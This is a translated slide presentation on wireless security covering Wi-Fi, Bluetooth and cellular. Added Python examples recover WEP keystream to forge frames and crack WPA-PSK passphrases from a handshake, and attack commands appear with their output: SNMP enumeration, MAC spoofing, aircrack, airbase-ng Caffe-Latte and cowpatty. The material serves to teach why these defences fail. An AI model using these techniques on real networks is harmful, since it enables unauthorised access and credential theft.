Wireless network security
Profile
● Security analyst since 1992
● Researcher in computer forensics, smartcards, wireless networks and pen-testing
● Coordinator of incident response teams in government and in the private sector
● Books on network security and on wireless networks (Wi-Fi and Bluetooth)
● Auditor of the ICP-Brasil Root CA
● Author and co-author of tools such as Chkrootkit, BTSearch and Beholder

Agenda
● Definitions of wireless networks
● Main characteristics
● Security aspects
● Wi-Fi ● Bluetooth ● Infrared ● WiMax ● RFID ● Cellular (GSM/TDMA/CDMA, etc.) ● ZigBee (802.15.4) ● UWB (802.15.3) ● Wibree (Nokia)
Bluetooth
"Standard range of 10 to 250 metres"
(image © wifi toys)
Wi-Fi uses the unlicensed Industrial, Scientific & Medical (ISM) bands:
  902-928 MHz
  2.4-2.485 GHz (2.4 to 2.5 GHz in Brazil)
  5.150-5.825 GHz
WiMax (802.16/a) uses licensed bands (10-66 GHz / 2-10 GHz)
Characteristics of Wi-Fi networks
● IEEE 802.11, current standards:
  802.11b - 11 Mb/s, 2.4 GHz
  802.11a - 54 Mb/s, 5.1 GHz
  802.11g - 54 Mb/s, 2.4 GHz
  802.11i - security mechanisms
  802.1x - authentication mechanisms, used on wired and wireless networks
  802.11n - higher speed, 108 Mb/s nominal
Channels - 802.11b
  Channel   Frequency (GHz)
  1         2.412
  2         2.417
  3         2.422
  4         2.427
  5         2.432
  6         2.437
  7         2.442
  8         2.447
  9         2.452
  10        2.457
  11        2.462
  12        2.467
  13        2.472
  14        2.484
Channels - 802.11a/b/g
  $ iwlist wlan0 freq
  wlan0     24 channels in total; available frequencies :
            Channel 01 : 2.412 GHz
            Channel 02 : 2.417 GHz
            Channel 03 : 2.422 GHz
            Channel 04 : 2.427 GHz
            Channel 05 : 2.432 GHz
            Channel 06 : 2.437 GHz
            Channel 07 : 2.442 GHz
            Channel 08 : 2.447 GHz
            Channel 09 : 2.452 GHz
            Channel 10 : 2.457 GHz
            Channel 11 : 2.462 GHz
            Channel 36 : 5.18 GHz
            Channel 40 : 5.2 GHz
            Channel 44 : 5.22 GHz
            Channel 48 : 5.24 GHz
            Channel 52 : 5.26 GHz
            Channel 56 : 5.28 GHz
            Channel 60 : 5.3 GHz
            Channel 64 : 5.32 GHz
            Channel 149 : 5.745 GHz
            Channel 153 : 5.765 GHz
            Channel 157 : 5.785 GHz
            Channel 161 : 5.805 GHz
            Channel 165 : 5.825 GHz
            Current Frequency=2.422 GHz (Channel 3)
Usage models
● Ad-hoc
● Infrastructure

Usage models - open network (SSID broadcast enabled)
(figure: the network name appears in the client's list of available networks)
  # iwlist wlan0 scan
  wlan0     Scan completed :
            Cell 01 - Address: 00:07:40:XX:XX:XX
                      ESSID:"PAIVA"
                      Mode:Master
                      Channel:3
                      Frequency:2.422 GHz (Channel 3)
                      Quality=61/100  Signal level=-71 dBm  Noise level=-86 dBm
                      Encryption key:on
                      Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                                9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                                48 Mb/s; 54 Mb/s
            Cell 02 - Address: 00:15:E9:XX:XX:XX
                      ESSID:"tamires"
                      Mode:Master
                      Channel:6
                      Frequency:2.437 GHz (Channel 6)
                      Quality=51/100  Signal level=-78 dBm  Noise level=-93 dBm
                      Encryption key:on
                      Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                                12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                                48 Mb/s; 54 Mb/s
Usage models - closed network (SSID broadcast disabled)
The AP still sends beacons; only the SSID field is empty. A neighbouring AP on channel 11 shows what a normal beacon looks like:
  09:46:02 2422 202dB Beacon () ESS CH: 1
  09:46:02 2422 201dB Beacon () ESS CH: 1
  09:46:02 2422 198dB Beacon () ESS CH: 1
  09:51:00 2422 184dB Beacon (dlink) ESS CH: 11
  09:51:01 2422 185dB Beacon (dlink) ESS CH: 11
  09:51:01 2422 186dB Beacon (drink) ESS CH: 11
(figure: the closed network does not appear in the client's list of available networks)
  # iwlist wlan0 scan
            Cell 02 - Address: 00:13:60:7D:CF:10
                      ESSID:""
                      Mode:Master
                      Channel:5
                      Frequency:2.432 GHz (Channel 5)
                      Quality=42/100  Signal level=-84 dBm  Noise level=-127 dBm
                      Encryption key:on
                      IE: WPA Version 1
                          Group Cipher : TKIP
                          Pairwise Ciphers (1) : TKIP
                          Authentication Suites (1) : 802.1x
            Cell 03 - Address: 00:14:6A:7C:15:B0
                      ESSID:""
                      Mode:Master
                      Channel:44
                      Frequency:5.22 GHz (Channel 44)
                      Quality=52/100  Signal level=-72 dBm  Noise level=-93 dBm
                      Encryption key:on
                      IE: WPA Version 1
                          Group Cipher : TKIP
                          Pairwise Ciphers (1) : TKIP
                          Authentication Suites (1) : PSK
Wired Equivalent Privacy - WEP

Wi-Fi Protected Access - WPA
● Released before the 802.11i standard was ratified
● Two modes:
  - WPA-PSK / WPA2-PSK: pre-shared key
  - WPA / WPA2 Enterprise: requires 802.1x

WPA(2)-PSK - pre-shared keys

802.1x (Extensible Authentication Protocol - EAP)

WPA/WPA2 Enterprise
(figure: user directory with accounts ana, pedro, jonas, jose ...; login: ana, password: ********)

802.1x
Wireless networks - main problems
● Default configuration (passwords, network name, DHCP, SNMP, etc.)
● Ineffective filtering methods
● Weakness of the WEP model
● Traffic eavesdropping
● Denial of service
● Problems with WPA and 802.1x
Factory settings

Factory settings - SNMP
With the default "public" community string the device answers any query, here the system group and then its ARP table (ipNetToMediaPhysAddress), which lists every host on the LAN:
  snmpwalk -Os -c public -v 1 192.168.0.1 system
  sysDescr.0 = STRING: Netgear ProSafe DualBand Wireless Firewall FWAG114
  sysObjectID.0 = OID: enterprises.0
  sysUpTime.0 = Timeticks: (699775) 1:56:37.75
  sysContact.0 = STRING: http://www.netgear.com
  sysName.0 = STRING:
  sysLocation.0 = STRING:
  sysServices.0 = INTEGER: 6

  snmpwalk -On -c public -v 1 192.168.0.1 .1.3.6.1.2.1.4.22.1.2.3
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.5 = STRING: 0:c:41:a:25:20
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.2 = STRING: 8:0:46:ba:8:cb
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.3 = STRING: 0:50:56:c0:0:1
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.4 = STRING: 0:15:0:41:9d:e5
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.6 = STRING: 0:d0:c4:1d:25:20
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.8 = STRING: 0:22:2d:2b:e3:1d
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.7 = STRING: 0:04:e2:8c:38:04
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.11 = STRING: 1:03:dc:c1:17:d9
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.9 = STRING: 0:0c:df:29:1d:60
  .1.3.6.1.2.1.4.22.1.2.3.192.168.0.10 = STRING: 0:a4:9:a5:b1:10
Disabling SSID broadcast
Beacons from the hidden network carry an empty SSID, but the name is sent in clear as soon as a client probes for it or associates:
  23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
  23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
  23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
  23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
  23:05:17.802928 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
  23:05:17.831746 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
  23:05:17.873675 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
  23:05:17.887420 Assoc Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]

Disabling SSID broadcast - airodump-ng view
The hidden AP shows up as <length: 0>; the station associated with it is probing for "linksys", which gives the name away:
  CH 10 ][ Elapsed: 9 mins ][ 2009-08-28 14:24

  BSSID              PWR  Beacons  #Data,  #/s  CH  MB    ENC   CIPHER  AUTH  ESSID
  00:07:40:4D:1A:5C  103  322      522     0    3   54    WEP   WEP           Homenet54
  00:19:E0:64:DC:10  101  330      3       0    11  11 .  WPA2  CCMP    PSK   PCSL
  00:1F:33:CD:CA:4A  101  177      0       0    11  54 .  WPA   TKIP    PSK   NETGEAR
  00:1B:11:50:2F:2E  86   461      24      0    6   54 .  WEP   WEP     OPN   dlink
  00:16:B6:47:CF:B9  -1   0        570     0    6   -1    OPN                 <length: 0>

  BSSID              STATION            PWR  Rate    Lost  Packets  Probes
  00:07:40:4D:1A:5C  00:1B:77:7B:82:27  89   11 - 1  107   623
  00:16:B6:47:CF:B9  00:23:12:05:64:C1  104  0 - 5   62    1343     linksys
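Added example (not from the presentation): a small parser for 802.11 management frames that reproduces what the two captures above show. Beacons from an AP with SSID broadcast disabled carry a zero-length SSID element, but the probe response and the association request carry the name in clear, and every probe request advertises the names a client is looking for. The frames, the order of events and the client address are constructed here; the AP address is the NETGEAR BSSID from the airodump-ng listing.

```python
# Added example: parsing 802.11 management frames to show why a hidden SSID is not secret.
# All frames below are constructed, not traffic from the presentation.

BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE = {0: "Assoc Request", 4: "Probe Request", 5: "Probe Response", 8: "Beacon"}
# Bytes of fixed fields between the 24-byte MAC header and the tagged parameters
FIXED_LEN = {0: 4, 4: 0, 5: 12, 8: 12}


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype, addr1, addr2, addr3, ssid, hidden=False):
    """Constructed management frame (no FCS): frame control, duration, three addresses,
    sequence control, fixed fields, then tagged parameters (SSID is tag 0, rates tag 1)."""
    fc = bytes([subtype << 4, 0])  # type 0 = management, flags 0
    hdr = fc + b"\x00\x00" + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3) + b"\x00\x00"
    ssid_b = b"" if hidden else ssid.encode()
    tags = bytes([0, len(ssid_b)]) + ssid_b
    tags += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])  # supported rates 1, 2, 5.5, 11 Mbit (basic)
    return hdr + b"\x00" * FIXED_LEN[subtype] + tags


def parse_mgmt(frame):
    """Return addresses, subtype and SSID tag of a management frame, None for anything else."""
    ftype, subtype = (frame[0] >> 2) & 3, frame[0] >> 4
    if ftype != 0 or subtype not in FIXED_LEN:
        return None
    pos = 24 + FIXED_LEN[subtype]
    tags = {}
    while pos + 2 <= len(frame):  # walk the (id, length, value) tagged parameters
        tid, tlen = frame[pos], frame[pos + 1]
        tags[tid] = frame[pos + 2:pos + 2 + tlen]
        pos += 2 + tlen
    return {
        "subtype": SUBTYPE[subtype],
        "addr1": mac_str(frame[4:10]),
        "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
        "ssid": tags.get(0, b"").decode(errors="replace"),
    }


def track_ssids(frames):
    """Beacons with an empty SSID only mark the BSSID as hidden; the probe response and the
    association request carry the real name, and probe requests show what each client asks for."""
    aps, probes = {}, {}
    for frame in frames:
        m = parse_mgmt(frame)
        if m is None:
            continue
        if m["subtype"] == "Beacon":
            aps.setdefault(m["addr3"], m["ssid"] or "<hidden>")
        elif m["subtype"] == "Probe Response":
            aps[m["addr3"]] = m["ssid"]
        elif m["subtype"] == "Assoc Request":
            aps[m["addr1"]] = m["ssid"]
        elif m["subtype"] == "Probe Request":
            probes.setdefault(m["addr2"], set()).add(m["ssid"])
    return aps, probes


AP = "00:1f:33:cd:ca:4a"      # NETGEAR BSSID from the airodump-ng listing
CLIENT = "00:23:12:05:64:c1"  # constructed station
CAPTURE = [
    build_mgmt(8, BROADCAST, AP, AP, "NETGEAR", hidden=True),  # beacon, SSID broadcast disabled
    build_mgmt(4, BROADCAST, CLIENT, BROADCAST, "NETGEAR"),    # client probes by name
    build_mgmt(5, CLIENT, AP, AP, "NETGEAR"),                  # AP answers with the name in clear
    build_mgmt(0, AP, CLIENT, AP, "NETGEAR"),                  # association request repeats it
]

if __name__ == "__main__":
    print(track_ssids(CAPTURE[:1]))  # beacon only: the AP is just "<hidden>"
    print(track_ssids(CAPTURE))      # after one client joins: NETGEAR, and the client's probe list
```

The same walk over tagged parameters is what airodump-ng does to fill the ESSID and Probes columns; hiding the SSID therefore delays discovery only until the first client connects, and it makes every client leak its preferred network names wherever it goes.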
MAC filtering
The address the filter keys on is printed by the client itself:
  $ ifconfig wlan0
  wlan0     Link encap:Ethernet  HWaddr 00:0C:41:E3:5F:5A
            inet addr:192.168.11.3  Bcast:192.168.11.255  Mask:255.255.255.0
            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
            RX packets:842 errors:0 dropped:0 overruns:0 frame:0
            TX packets:637 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:1000
            RX bytes:152984 (149.3 KiB)  TX bytes:69539 (67.9 KiB)

  c:\> ipconfig /all
  Windows 2000 IP Configuration
  [...]
  Ethernet adapter Local Area Connection:
            Connection-specific DNS Suffix . : xxx.com.br
            Description . . . . . . . . . . . : 3Com EtherLink XL 10/100 PCI For Complete PC Management NIC (3C905C-TX)
            Physical Address. . . . . . . . . : 00-04-76-16-3F-DB

MAC filtering - changing the address
Any address seen in the air (for instance in the airodump-ng station list) can be set on the attacker's card with one command:
  Linux
  # ifconfig ath0 hw ether 00:00:00:00:00:01
  FreeBSD
  # ifconfig xl3 ether 00:00:00:00:00:01
  OpenBSD/NetBSD
  # wiconfig wi0 -m 00:00:00:00:00:01
Weakness of WEP
A 3-hour capture (72 MB, 264394 unique IVs) gives the key in seconds:
  # time aircrack trafego.cap
  aircrack 2.1

  * Got 264394! unique IVs | fudge factor = 2
  * Elapsed time [00:00:01] | tried 0 keys at 0 k/m

  KB  depth  votes
   0  0/ 2   46( 28) 20( 15) 97( 13) D8( 12) DB( 10) BE(  8) 38(  5)
   1  0/ 2   41( 30) 97( 18) 4D( 13) D8( 13) 7E( 12) 91( 12) 86(  9)
   2  0/ 2   4E( 65) 51( 55) 0F( 15) 48( 15) B3( 15) 53(  9) F0(  5)
   3  0/ 2   54( 58) E9( 48) DA( 28) F6( 21) F3( 16) D1( 15) F4( 15)
   4  0/ 1   41(174) 5F( 41) 9A( 28) 9B( 24) 50( 22) A4( 21) F5( 21)

           KEY FOUND! [ 46414E5441 ]

  real    0m31.939s
  user    0m0.706s
  sys     0m0.533s
AP switched off
The real AP does not even need to be on the air: a client that remembers a WEP network associates with a fake AP of the same name, and the keystream it leaks is enough to recover the key (Caffe-Latte attack):
  airbase-ng -c 11 -L -e virus.exe -W 1 wlan1
  23:11:31  Created tap interface at0
  23:11:31  Access Point with BSSID 00:21:29:65:B8:45 started.
  23:12:25  Got 140 bytes keystream: 00:23:12:D7:DA:F8
  23:12:25  SKA from 00:23:12:D7:DA:F8
  23:12:25  Client 00:23:12:D7:DA:F8 associated (WEP) to ESSID: "virus.exe"
  23:12:25  Starting Caffe-Latte attack against 00:23:12:D7:DA:F8 at 100 pps.
  23:12:36  Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"
  23:12:36  Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"
  23:12:36  Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"
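Added example (not from the presentation) for the two slides above, the aircrack run and the Caffe-Latte session: WEP is already broken before the key is recovered. RC4 is seeded with a 24-bit IV prepended to the key, so one frame with known plaintext yields the keystream for that IV, and with the keystream an attacker can forge any shorter frame with a valid ICV, which is what the "Got 140 bytes keystream" line in the airbase-ng output refers to. The packets, the IV and the ARP body are constructed; the key is the one aircrack printed (46414E5441, "FANTA").

```python
# Added example: WEP keystream recovery and frame forging without the key.
# Constructed packets; the key "FANTA" is the one aircrack found on the slide (46414E5441).
import math
import struct
import zlib


def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:        # keystream generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: plain CRC32, little-endian, which is linear and not keyed."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """WEP body: IV (3 bytes, sent in clear) + key id byte + RC4(IV||key, plaintext||ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key, frame):
    iv, body = frame[:3], frame[4:]
    pt = rc4(iv + key, body)
    data, tag = pt[:-4], pt[-4:]
    return data, tag == icv(data)


def recover_keystream(frame, known_plaintext):
    """Ciphertext XOR known plaintext = RC4 keystream for this IV, no key needed. This is the
    step airbase-ng reports as "Got N bytes keystream": ARP bodies are almost fully predictable."""
    iv, body = frame[:3], frame[4:]
    pt = known_plaintext + icv(known_plaintext)
    return iv, bytes(a ^ b for a, b in zip(body, pt))


def forge_with_keystream(iv, keystream, new_plaintext):
    """Any frame up to the keystream length gets a valid ICV under the same IV: WEP has no
    replay protection and nothing forbids IV reuse, so the AP accepts the forged frame."""
    pt = new_plaintext + icv(new_plaintext)
    if len(pt) > len(keystream):
        raise ValueError("not enough keystream for this frame")
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(pt, keystream))


def iv_collision_packets(p=0.5):
    """Frames after which two share a 24-bit IV with probability p (birthday bound)."""
    return math.ceil(math.sqrt(2 * 2 ** 24 * math.log(1 / (1 - p))))


KEY = b"FANTA"                 # 46414E5441 from the aircrack output
IV = b"\x0c\x0b\x0a"           # constructed IV
LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"
# Constructed ARP request from the victim (sender 00:23:12:d7:da:f8 / 192.168.11.2,
# target 192.168.11.1): treated as known plaintext by the attacker.
VICTIM_ARP = (LLC_SNAP_ARP + bytes.fromhex("0001080006040001")
              + bytes.fromhex("002312d7daf8c0a80b02") + bytes(6) + bytes.fromhex("c0a80b01"))
NEW_PACKET = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"injected IP payload"  # shorter than the ARP


def demo():
    frame = wep_encrypt(KEY, IV, VICTIM_ARP)                  # what the sniffer sees
    iv, keystream = recover_keystream(frame, VICTIM_ARP)      # no key involved from here on
    forged = forge_with_keystream(iv, keystream, NEW_PACKET)
    data, ok = wep_decrypt(KEY, forged)                       # the AP only checks the ICV
    return keystream, data, ok


if __name__ == "__main__":
    ks, data, ok = demo()
    print(len(ks), "bytes of keystream; forged frame accepted:", ok, data)
    print("50% chance of an IV collision after", iv_collision_packets(), "frames")
```

The recovered keystream is exactly RC4(IV||key) applied to zeros, which is why the same IV must never be reused and why a 24-bit IV space (a collision is expected after a few thousand frames) was a design error independent of the key-recovery attacks aircrack uses.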
Eavesdropping - open network
  # tcpdump -i eth0 -s 1700
  tcpdump: WARNING: eth0: no IPv4 address assigned
  tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1700 bytes
  17:09:38.193741 IP (tos 0x0, ttl 128, id 49930, offset 0, flags [DF], length: 48) 192.168.11.2.3597 > 200.155.13.26.http: S [tcp sum ok] 3524687372:3524687372(0) win 16384 <mss 1460,nop,nop,sackOK>
Denial of service - DoS
DoS - interference
Problems with WPA
Capture the 4-way handshake, then run a dictionary attack against the pre-shared key:
  # tcpdump -w trafego.log
  # cowpatty -f /usr/share/dict/word -r trafego.log -s NETGEAR
  cowpatty 2.0 - WPA-PSK dictionary attack. <[email protected]>
  Collected all necessary data to mount crack against passphrase.
  Starting dictionary attack. Please be patient.
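Added example (not from the presentation) of what cowpatty computes for each word of the dictionary: PBKDF2(passphrase, SSID) gives the PMK, the 802.11i PRF over both MAC addresses and both nonces gives the PTK, and the first 16 bytes of the PTK (the KCK) must reproduce the MIC carried in message 2 of the captured 4-way handshake. The MACs, nonces, EAPOL frame, wordlist and the passphrase "brasil2009" are constructed; the PMK check for "password"/"IEEE" uses the test vector published in the 802.11i standard.

```python
# Added example: the per-word computation of a WPA-PSK dictionary attack (cowpatty-style).
# Handshake values are constructed here; nothing comes from a real capture.
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # EAPOL header (4) + key descriptor fields up to the 16-byte MIC


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); the SSID is the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512: HMAC-SHA1 chain over "Pairwise key expansion", sorted MACs and nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = bytes 0..15, KEK = 16..31, temporal key = 32..63


def eapol_mic(kck, eapol_frame):
    """WPA2 key descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed, 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce, mic=bytes(16)):
    """Constructed message 2 of the 4-way handshake: EAPOL-Key, RSN descriptor, empty key data."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1-128), pairwise key, MIC present
    body = (bytes([2]) + struct.pack(">HHQ", key_info, 0, 1) + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack(">H", 0))
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, msg2):
    """For each candidate: PBKDF2 -> PTK -> KCK -> MIC, compared with the captured MIC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(word, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return word
    return None


SSID = "NETGEAR"                               # SSID used on the slide (-s NETGEAR)
AA = bytes.fromhex("001f33cdca4a")             # AP address from the airodump-ng listing
SPA = bytes.fromhex("0023120564c1")            # constructed station address
ANONCE = bytes(range(32))                      # constructed nonces
SNONCE = bytes(range(32, 64))
SECRET = "brasil2009"                          # constructed passphrase the station used
WORDLIST = ["password", "12345678", "netgear1", "brasil2009", "sunshine"]


def captured_handshake():
    """Simulate the station producing message 2 with the real passphrase."""
    kck = ptk_from_pmk(pmk_from_passphrase(SECRET, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


def demo():
    return crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, captured_handshake())


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096 PBKDF2 iterations are what makes each guess expensive, and the SSID acting as salt is why precomputed tables (genpmk) are only valid for one network name; a long random passphrase on an uncommon SSID defeats both, whereas a dictionary word on "NETGEAR" or "linksys" falls to tables that already exist.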
Karma
KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11 Access Point that responds to any probed SSID. So if a client looks for 'linksys', it is 'linksys' to them (even while it may be 'tmobile' to someone else). Operating in this fashion has revealed vulnerabilities in how Windows XP and MacOS X look for networks, so clients may join even if their preferred networks list is empty.
● Provides DHCP
● Captures POP3/FTP credentials
● Redirects HTTP to a malicious server or acts as a transparent proxy
AirPWN
[...] The configurations were:
  * HTTP 100% of the screen
  * HTTP replacing all images
  * HTTP background via CSS
  * HTTP "owned" graphic, replacing all images
  * HTTP javascript alert boxes, letting people know just how pwned they were
  * FTP banners (while this worked, nobody pays attention to FTP banners so we abandoned this quickly)
Ease of access
Ranked from easiest to hardest for an attacker to get on the network:
  1. Open network with DHCP enabled
  2. Open network without DHCP
  3. Access control based on IP and/or MAC address
  4. WEP
  5. WPA-PSK
  6. 802.1x (username/password)
(easy at the top, hard at the bottom)
GSM 2.5G vs 3G

GSM 2.5G
  Data networks: GPRS/EDGE
  Frequencies: 850, 900, 1800, 1900 MHz
  Speed: 384 kbps

GSM 3G
  Data networks: HSDPA/UMTS
  Frequencies: 850, 1900, 2100 MHz
  Speed: 7.2 Mbps

LTE (Long Term Evolution)
  3rd Generation Partnership Project (3GPP), marketed as 4G
  Speed: 326.4 Mbit/s
Bluetooth

Characteristics
  Frequency: 2.4 GHz
  Speed: 1 Mbit/s basic rate, 3 Mbit/s nominal with 2.0+EDR
  Range: 10-250 m

Network type
  Point-to-point, or a piconet around a master: 7 + 1 participants
Wireless Access in Vehicular Environments (WAVE)
● Allows vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communication
● Designed to work in adverse conditions with low latency, medium distances and high mobility